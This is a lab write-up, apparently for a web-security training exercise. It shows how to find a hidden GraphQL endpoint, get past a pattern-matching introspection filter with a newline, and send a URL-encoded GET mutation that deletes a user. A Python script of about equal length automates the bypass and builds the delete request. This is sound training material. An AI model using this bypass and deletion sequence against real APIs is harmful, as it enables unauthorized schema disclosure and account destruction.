Finding a hidden GraphQL endpoint
PRACTITIONER
Last updated
The user management functions for this lab are powered by a hidden GraphQL endpoint. You won't be able to find this endpoint by simply clicking pages in the site. The endpoint also has some defenses against introspection.
To solve the lab, find the hidden endpoint and delete carlos.
For this lab you do not need to interact with the UI; you only need to capture one initial request to the site so you have a base request to work from.
First I found the hidden endpoint by running a content-discovery scan in Burp; a directory brute-forcer such as ffuf or gobuster against the same host works just as well, since the endpoint is only hidden in the sense that nothing on the site links to it.
Once the scan reveals /api, requesting it directly returns a JSON error with the message "Query not present", which confirms a GraphQL endpoint waiting for a query parameter.
Since the endpoint takes the query via GET, the GraphQL document goes in the `query` URL parameter and has to be URL-encoded (braces, quotes, spaces and newlines included) or the server will not parse it. An endpoint that accepts GET requests like this is also worth noting for CSRF: if it accepts mutations over GET, a plain link or image tag can trigger them.
The endpoint rejects the usual introspection query. Its defence is a simple pattern match around the `__schema` keyword, so put a newline between `__schema` and the `{` that follows it and resend: the document is still valid GraphQL but no longer matches the filter.
Save the introspection response to a JSON file and read the schema from it. The `getUser` query returns a user by id, which is how you find the id for carlos, and the mutation type alongside it contains the operation that deletes a user. Rewrite the request into that mutation with carlos's id, URL-encoded in the same `query` parameter, to solve the lab.
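The whole sequence as a worked Python example, added here and not code from the original write-up or from PortSwigger: it URL-encodes a GraphQL document into the GET query string, shows the newline bypass against a pattern-matching introspection filter, and pulls the `getUser` query and the delete mutation (with their argument types) out of a saved introspection JSON. The `/api` path is the one the scan found above; the filter model, the mutation name `deleteUser`, its `id: Int!` argument, the sample user id and the sample introspection JSON are constructed for the demo and are not lab output.

```python
"""Hidden GraphQL endpoint helper (added example, not the write-up's code)."""
import json
import re
import sys
import urllib.parse
import urllib.request

ENDPOINT = "/api"  # path revealed by the directory scan in the write-up

# Assumed model of the introspection defence: a pattern that catches
# "__schema{" and "__schema {" on one line but never looks past a newline.
INTROSPECTION_FILTER = re.compile(r"__schema[ \t]*\{")

BLOCKED_INTROSPECTION = "{__schema{queryType{name}}}"
INTROSPECTION_QUERY = """query IntrospectionQuery {
  __schema
  {
    queryType { name }
    mutationType { name }
    types {
      kind
      name
      fields {
        name
        args { name type { kind name ofType { kind name ofType { kind name } } } }
      }
    }
  }
}"""


def is_blocked(query):
    """True when the assumed filter would reject this query."""
    return INTROSPECTION_FILTER.search(query) is not None


def build_get_url(base, query, variables=None):
    """GET form of a GraphQL request: query (and JSON variables) URL-encoded,
    so braces, quotes and the bypass newline survive the trip."""
    params = {"query": query}
    if variables is not None:
        params["variables"] = json.dumps(variables)
    return base + ENDPOINT + "?" + urllib.parse.urlencode(params)


def render_type(t):
    """Render an introspection type reference as GraphQL syntax, e.g. Int!"""
    if t is None:
        return "?"
    if t["kind"] == "NON_NULL":
        return render_type(t.get("ofType")) + "!"
    if t["kind"] == "LIST":
        return "[" + render_type(t.get("ofType")) + "]"
    return t["name"]


def index_operations(introspection):
    """{"query": {field: {arg: type}}, "mutation": {...}} from the saved JSON."""
    schema = introspection["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    ops = {}
    for kind, root in (("query", schema.get("queryType")),
                       ("mutation", schema.get("mutationType"))):
        if not root:
            continue
        ops[kind] = {
            f["name"]: {a["name"]: render_type(a["type"]) for a in f.get("args") or []}
            for f in types[root["name"]].get("fields") or []
        }
    return ops


def delete_mutation(ops):
    """Name of the first mutation that deletes something, or None."""
    for name in ops.get("mutation", {}):
        if "delete" in name.lower():
            return name
    return None


def build_delete_query(mutation, user_id):
    """Mutation text to remove one user by id (assumed signature: id: Int!)."""
    return "mutation { %s(id: %d) }" % (mutation, user_id)


INT_NON_NULL = {"kind": "NON_NULL", "name": None,
                "ofType": {"kind": "SCALAR", "name": "Int", "ofType": None}}

# Constructed stand-in for the saved introspection response (not lab output).
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "query"},
    "mutationType": {"name": "mutation"},
    "types": [
        {"kind": "OBJECT", "name": "query", "fields": [
            {"name": "getUser", "args": [{"name": "id", "type": INT_NON_NULL}]}]},
        {"kind": "OBJECT", "name": "mutation", "fields": [
            {"name": "deleteUser", "args": [{"name": "id", "type": INT_NON_NULL}]}]},
        {"kind": "SCALAR", "name": "Int", "fields": None},
    ]}}}

if __name__ == "__main__":
    if len(sys.argv) > 1:  # python3 hidden_graphql.py https://LAB-HOST
        with urllib.request.urlopen(build_get_url(sys.argv[1], INTROSPECTION_QUERY)) as resp:
            introspection = json.load(resp)
        with open("introspection.json", "w") as fh:  # keep a copy, as the write-up does
            json.dump(introspection, fh, indent=2)
    else:
        introspection = SAMPLE_INTROSPECTION
    assert is_blocked(BLOCKED_INTROSPECTION) and not is_blocked(INTROSPECTION_QUERY)
    ops = index_operations(introspection)
    print(json.dumps(ops, indent=2))
    # Look users up by id with getUser until the username is carlos, then delete.
    print(build_get_url("https://LAB-HOST", "{ getUser(id: 3) { id username } }"))
    print(build_get_url("https://LAB-HOST", build_delete_query(delete_mutation(ops), 3)))
```

Run it with no arguments to see the parsing against the constructed sample; pass the lab origin as the first argument to fetch and save the real introspection response instead. `urllib.parse.urlencode` percent-encodes the braces, quotes and the bypass newline, which is exactly what the GET form of the request needs; the newline in `INTROSPECTION_QUERY` is what keeps the document clear of the modelled filter.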